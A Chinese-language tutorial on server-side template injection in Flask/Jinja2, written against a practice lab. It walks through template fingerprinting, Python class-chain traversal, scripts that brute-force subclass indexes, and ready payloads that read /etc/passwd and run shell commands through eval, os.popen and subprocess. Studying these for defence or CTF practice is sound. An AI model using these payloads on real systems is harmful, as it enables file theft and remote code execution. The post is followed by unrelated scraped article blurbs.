ssti学习(1)

一、成因:

渲染模板时,没有严格控制对用户的输入。(使用了危险的模板,导致用户可以和flask程序进行交互)

flask是一种基于web开发的web服务器,如果用户可以和flask交互,则可以执行eval、system等函数。

二、后果

可能造成任意文件读取和RCE远程控制后台系统。

三、如何判断对方的模板

常见模板有Smarty、Mako、Twig、Jinja2、Eval、Flask、Tornado、Go、Django、Ruby等。

  这幅图的含义是通过这些指令去判断对方用的是什么模板,下面解释一下这幅图的意思:
  绿色箭头是执行成功,红色箭头是执行失败。
首先是注入${7*7}没有回显出49的情况,这种时候就是执行失败走红线,再次注入{{7*7}}如果还是没有回显49就代表这里没有模板注入;如果注入{{7*7}}回显了49代表执行成功,继续往下走注入{{7*'7'}},如果执行成功回显7777777说明是jinja2模板,如果回显是49就说明是Twig模板。
  然后回到最初注入${7*7}成功回显出49的情况,这种时候是执行成功走绿线,再次注入a{*comment*}b,如果执行成功回显ab,就说明是Smarty模板;如果没有回显出ab,就是执行失败走红线,注入${"z".join("ab")},如果执行成功回显出zab就说明是Mako模板。实际做题时也可以把指令都拿去测测看谁能对上。平时做题也可以多搜集不同模板对应的注入语句语法。

四、继承关系

继承:即一个派生类(derived class)继承基类(base class)的字段和方法。继承也允许把一个派生类的对象作为一个基类对象对待。例如,有这样一个设计:一个Dog类型的对象派生自Animal类,这是模拟"是一个(is-a)"关系

在 python 中,类之间是会有继承关系的,也就是派生类(子类)与基类(父类)的关系,这可以理解为父子关系。在这个父子关系中的最高级,就是 object 。也就是说,object 是祖宗类。
一般来说,SSTI 构造 payload 的思想,就是要通过各个数据类型 Numbers(数字)String(字符串)List(列表)Tuple(元组)Dictionary(字典) 这些子类,一直往上找到 object ,然后再通过找 object 类可以利用的子类。可以利用的子类,就是这个子类的方法(popen() eval()等方法)或属性可以利用。

五、魔术方法
在 python 中,魔术方法是一种两边以双下划线 __ 包裹的特殊方法,利用这些方法,我们可以实现类的寻找,初始化对象的成员,以及最后的利用。

常用魔术方法及作用
单下划线、双下划线、头尾双下划线说明:
__foo__: 定义的是特殊方法,一般是系统定义名字 ,类似 __init__() 之类的。
_foo: 以单下划线开头的表示的是 protected 类型的变量,即保护类型只能允许其本身与子类进行访问,不能用于 from module import *
__foo: 双下划线的表示的是私有类型(private)的变量, 只能是允许这个类本身进行访问了。—菜鸟教程 Python 基础教程

__class__ : 以字符串形式返回当前对象所属类
__base__ : 以字符串形式返回当前类的基类
__bases__ : 以元组()形式返回当前类的所有基类
__mro__ : 以元组()形式返回从当前类到 object 类的所有类,顺序为从子类逐级往上。 __mro__[1] 或者 __mro__[-1] 都可以得到 object 类。
__subclasses__() : 以列表[]形式返回当前类的下一级所有子类
__init__ : 构造函数,当类被实例化时可以用它来快捷的初始化一些属性。SSTI 中可以用它获取选定子类的初始化方法。
__globals__ : __globals__在函数后使用,以字典形式返回当前位置的所有全局变量,包括所有导入的变量。当其在 __init__ 后使用时,即获取初始化方法的全局变量字典。这些变量可能是模块、方法、变量。

通过以上魔术方法,再配合一些系统命令,就可以构造出基本的 payload 了。

六、常用注入模块

(靶场、源代码来自橙子工作室)

1、文件读取

关键子类:__frozen__importlib__external.FileLoader
该子类可用于读取系统文件

# 引入 request 模块用于发起请求
import requests
# input 定义爆破 url
url = input('请输入 URL : ')
# 设置范围为 500
for i in range(500):
    # 爆破的 payload ,注意关键字 name 为本题接收参数,其他环境应根据实际分析
    data = {"name": "{{().__class__.__base__.__subclasses__()[" + str(i) + "]}}"}
    # 爆破测试
    try:
        # post 请求后的响应信息
        response = requests.post(url, data=data)
        # 打印响应信息
        # print(response.text)

        # 当状态码为 200 时,寻找响应信息中是否包含关键子类
        if response.status_code == 200:
            if '_frozen_importlib_external.FileLoader' in response.text:
                # 若存在,则打印索引值
                print(i)
    except:
        # 不存在或出现错误,则退出本次循环
        pass

通过该代码检索出__frozen__importlib__external.FileLoader所在的位置

查找并且回显到了__frozen__importlib__external.FileLoader,证明匹配成功。

接着利用 get_data() 函数传入参数0和文件路径,完成注入

name={{().__class__.__base__.__subclasses__()[79]["get_data"](0,"/etc/passwd")}}

2、内建函数eval执行命令

(内建函数:python在在执行脚本时自动加载的函数 )

首先要查找什么位置有eval函数

import requests
url = input("请输入 URL:")
for i in range(500):
    # payload 中需要先初始化再列出所有全局变量
    data = {"name": "{{().__class__.__base__.__subclasses__()["+str(i)+"].__init__.__globals__['__builtins__']}}"}
    response = requests.post(url, data=data)
    if response.status_code == 200:
        if "eval" in response.text:
            print(i)

name={{().__class__.__base__.__subclasses__()[66].__init__.__globals__['__builtins__']}}

在获取到的数据中任意尝试一个

验证成功

name={{().__class__.__base__.__subclasses__()[66].__init__.__globals__['__builtins__']['eval']('__import__("os").popen("whoami").read()')}}

__builtins__: 提供对Python的所有“内置“标识符的直接访问。
eval(): 计算字符串表达式的值。
__import__: 加载 os 模块。
popen(): 执行一个 shell 以运行命令来开启一个进程,执行 cat /etc/passwd 。
(popen() 执行命令后没有直接回显,最后加个 .read() 函数读取回显内容

原文参考:SSTI-3 常用模块及利用方法_橙子科技 ssti-CSDN博客

3、os模块执行命令

{{“”.__class__.__bases__[0].__subclasses__()[66].__init__.__globals__[‘os’].popen(“ls”).read()}}

{{“”.__class__.__base__.__subclasses__()[64].__init__.__globals__[‘builtins’][‘eval’]("__import__.(‘os’).popen(‘ls’).read()")}}
                      

4、importlib类执行模块

{{[].__class__.__base__.__subclasses__()[69].["load_module"]("os")[“popen”](‘ls’).read()}}

5、linecache函数执行模块

{{[].__class__.__base__.__subclasses__()[19].__init__.__globals__.linecache.os.popen("ls").read()}}

6、subprocess.Popen类执行命令

{{().__class__.__base__.__subclasses__()[13](“ls”,shell=True,stdout=-1).communicate()[0].strip()}}

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.mzph.cn/pingmian/12243.shtml

如若内容造成侵权/违法违规/事实不符,请联系多彩编程网进行投诉反馈email:809451989@qq.com,一经查实,立即删除!

相关文章

03 Linux编程-进程

1、进程的相关概念 1.1 程序与进程 程序是静态的概念,进程是程序的一次运行活动。 1.2 查看系统中有哪些进程 ps #只显示一小部分进程 ps -aux #会打印当前所有进程 ps -aux|grep init #使用grep筛选出只含有init的进程top #运行显示的进程有点类似windows…

视频号小店应该怎么去做呢?运营步骤分享!建议收藏!

大家好,我是电商小V 视频号小店是一个新推出的项目,目前可以说正处于红利期,也是正处于野蛮生长的阶段,平台现在对视频号的扶持可以说是非常大的,对于新入驻的商家也是非常友好的,所以说现在入驻是最好的时…

ASP.NET邮件收发程序的设计与开发

摘 要 《邮件收发程序的设计与开发》是一个综合性的程序设计,涉及到界面、系统、数据库、协议、编码等多个方面的内容。本设计前台采用.NET技术,后台数据库采用SQL Server 2000,语言采用C#,主要讲述了邮件系统的注册、登陆、管理、发送和…

定时器的理论和使用

文章目录 一、定时器理论1.1定时器创建和使用 二、定时器实践2.1周期触发定时器2.2按键消抖 一、定时器理论 定时器是一种允许在特定时间间隔后或在将来的某个时间点调用回调函数的机制。对于需要周期性任务或延迟执行任务的嵌入式应用程序特别有用。 软件定时器: …

SpringBoot多模块项目MybatisPlus配置

项目目录 主模块配置 配置类 Configuration EnableTransactionManagement MapperScan("com.sms.**.mapper") public class MybatisPlugConfig {Beanpublic MybatisPlusInterceptor mybatisPlusInterceptor() {MybatisPlusInterceptor mybatisPlusInterceptor new…

代码随想录算法训练营第二十八天| LeetCode93.复原IP地址 、LeetCode78.子集、LeetCode90.子集II

LeetCode 93. Restore IP Addresses LeetCode 93. 视频讲解&#xff1a;回溯算法如何分割字符串并判断是合法IP&#xff1f;| LeetCode&#xff1a;93.复原IP地址_哔哩哔哩_bilibili 这里返回的数字类型是List<String> 类型&#xff0c;那么可以直接操作String s&#xf…

回复完成 输入框还显示值的问题

回复完成 输入框还显示值的问题 解决代码 先把id 值清空 再构建下这个输入框 $("#details_article_reply_content").val(""); // 清空textareavar editor editormd("article_details_reply", {width: "100%",height: "100%"…

网上有哪些赚钱的方法能一天赚二三十?盘点7个靠谱的搞钱副业和赚钱软件

想在家里躺着就能把钱赚&#xff1f;这不再是遥不可及的梦想&#xff01;随着互联网的飞速发展&#xff0c;网上赚钱的方式层出不穷&#xff0c;总有一款适合你。 今天&#xff0c;就让我们一起揭开这些神秘面纱&#xff0c;看看哪些网上赚钱秘诀能让你轻松实现月入过万&#x…

PPQ模型量化工具

win11&#xff1a;ppq&#xff08;YOLO模型量化&#xff09;环境安装过程记录_windows11 yolox-CSDN博客

js 字符串 replace方法及示例

下面是一些使用JavaScript中字符串 replace 方法的示例代码&#xff0c;这些示例将帮助你理解如何使用此方法进行基本替换以及更高级的替换操作&#xff0c;包括使用正则表达式和函数作为替换值。 基础替换 let originalText "Hello, World!"; let newText origi…

C# OpenCvSharp DNN 黑白老照片上色

C# OpenCvSharp DNN 黑白老照片上色 目录 效果 项目 代码 下载 参考 效果 项目 代码 using OpenCvSharp; using OpenCvSharp.Extensions; using System; using System.Diagnostics; using System.Drawing; using System.Drawing.Imaging; using System.Runtime.InteropS…

工大智信智能听诊器在现代医疗管理中的应用

在现代医疗领域&#xff0c;随着科技的不断进步&#xff0c;智能医疗设备正逐渐成为提升医疗服务质量、优化医疗流程的重要工具。工大智信智能听诊器作为其中的佼佼者&#xff0c;其在医疗管理中的应用日益广泛&#xff0c;以下是其在不同医疗场景中的管理关键词及其应用概述。…

你有没有调用过第三方接口?碰到过哪些坑?

在我们的业务开发中&#xff0c;调用第三方接口已经成为常态&#xff0c;比如对接一些ERP系统、WMS系统、一些数据服务系统等&#xff0c;它极大地扩展了我们应用的功能和服务范围。然而&#xff0c;实际对接过程中&#xff0c;我们往往会在这一环节遇到各种意想不到的问题&…

Oracle 更改数据文件位置的几种常用方式

Oracle 更改数据文件位置的几种常用方式 A.归档模式下 1、offline 表空间&#xff1a;alter tablespace tablespace_name offline&#xff1b; 2、复制数据文件到新的目录&#xff1b; 3、rename 修改表空间&#xff0c;并修改控制文件&#xff1b; 4、online 表空间&#xf…

项目实施方案:多点异地机动车典型系统试验状态可视监控系统

目录 一、需求分析 1.1项目背景 1.2项目概述 二、系统优势 2.1兼容性能力强 2.2接入协议多样 2.3并发能力强 2.3.1 单平台参数 2.3.2 多平台性能参数 2.4 系统稳定性 三、建设目标 3.1安全性 3.2可扩展性 3.3易用性 3.4兼容性 3.5 响应能力 四、系统整体解决方…

单区域OSPF实验

实验目的&#xff1a; 理解OSPF的基本概念。掌握单曲于OSPF的配置掌握OSPF邻居状态的解读掌握通过Cost控制OSPF选路的方法掌握OSPF认证的配置方法 一、基础配置&#xff1a; 搭建实验拓扑图&#xff1b; 配置路由器接口的IP地址以及配置环回地址待后续使用 &#xff08;1&a…

MySQL数据分组技术深度解析及实践

在处理大量数据库记录时,数据分组是一种强大的工具,它允许我们按照特定列的值将数据划分为逻辑上的集合,进而对每个集合执行聚合操作,如计数、求和或平均值等。MySQL中的​​GROUP BY​​​子句正是实现这一功能的关键所在。本文将详细介绍​​GROUP BY​​的使用方法,结合…

文献速递:深度学习医学影像心脏疾病检测与诊断--基于深度学习的低剂量SPECT心肌灌注图像去噪:定量评估与临床表现

Title 题目 Deep learning–based denoising of low‑dose SPECT myocardialperfusion images: quantitative assessment and clinical performance 基于深度学习的低剂量SPECT心肌灌注图像去噪&#xff1a;定量评估与临床表现 01 文献速递介绍 单光子发射计算机断层扫描&a…

SMB攻击利用之-通过psexec发送命令流量数据包分析

SMB协议作为windows环境下最为常见的一种协议,在历史上出现过无数的通过SMB协议进行网络攻击利用的案例,包括针对SMB协议本身以及通过SMB协议实施网络攻击。 本文将介绍一种通过SMB协议的常见利用方式,即通过psexec工具控制远程的主机,作为我的专栏《SMB攻击流量数据包分析…

Spring的IOC和AOP机制?

我们是在使用Spring框架的过程中&#xff0c;其实就是为了使用IOC&#xff0c;依赖注入&#xff0c;和AOP&#xff0c;面向切面编程&#xff0c;这两个是Spring的灵魂。 主要用到的设计模式有工厂模式和代理模式。 IOC就是典型的工厂模式&#xff0c;通过sessionfactory去注入…